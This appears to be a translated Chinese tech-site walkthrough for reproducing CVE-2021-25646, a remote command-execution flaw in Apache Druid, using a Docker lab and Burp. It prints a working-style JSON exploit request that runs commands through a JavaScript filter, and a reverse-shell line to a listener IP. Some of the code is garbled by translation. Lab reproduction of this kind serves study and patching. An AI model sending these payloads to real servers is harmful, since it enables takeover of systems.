Shulou(Shulou.com)05/31 Report--

This article is about how to reproduce the Apache Druid command execution vulnerability CVE-2021-25646. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Introduction to 0x00

Druid is a distributed data processing system that supports real-time multi-dimensional OLAP analysis. It not only supports high-speed real-time data intake processing, but also supports real-time and flexible multi-dimensional data analysis and query. Therefore, the most commonly used scene in Druid is the flexible and fast multi-dimensional OLAP analysis under the background of big data. In addition, Druid has a key feature: it supports pre-aggregate intake and aggregate analysis of data based on timestamps, so it is often used by users in time-series data processing and analysis scenarios.

Overview of 0x01 vulnerabilities

In Druid 0.20.0 and earlier, a user sends a malicious request that can be exploited by an Apache Druid vulnerability to execute arbitrary code. An attacker can directly construct a malicious request to execute arbitrary code and control the server.

0x02 affects version

Apache Druid

< 0.20.1 0x03环境搭建 1、本次环境使用docker搭建，需要在虚拟机安装docker，安装完成后使用以下命令pull漏洞环境 docker pull fokkodriesprong/docker-druid 2、下载漏洞环境后使用以下命令启动漏洞环境 docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid 3、启动后在浏览器访问http://your-ip:8888/看到以下界面表示成功 0x04漏洞复现 1、在浏览器进入Apache Druid首页如何点击点击左上方Load data ->

Local disk button

2. Fill in Base directory: (quickstart/tutorial/) File filter in the form on the right:

(wikiticker-2015-09-12-sampled.json.gz) Click Preview when completed, and then click next

3. Open burp and configure the proxy, then click next until the next step is Next:Filter, grab the packet

4. Then replace the data data in the packet with the following code, then change the dnslog address in the code to your own, and click send to check whether dnslog has data.

{"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "local", "baseDir": "quickstart/tutorial/", "filter": "wikiticker-2015-09-12-sampled.json.gz"}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "json" "timestampSpec": {"column": "time", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript"

"function": "function (value) {return java.lang.Runtime.getRuntime () .exec ('ping kujqmk.dnslog.cn-c 1')}"

"dimension": "added"

"": {

"enabled": "true"

}

}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"}}

5. Change the dnslog address to the payload of the bouncing shell, and set the listening in kali to see the successful bounce of shell.

Exec ('/ bin/bash-c $@ | bash 0 echo bash-I > & / dev/tcp/172.16.1.132/8896 0 > & 1')

0x05 repair recommendation

1. Upgrade to the latest version of Apache Druid and download it at

Https://druid.apache.org/downloads.html

The above is how to reproduce the Apache Druid command execution vulnerability CVE-2021-25646. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.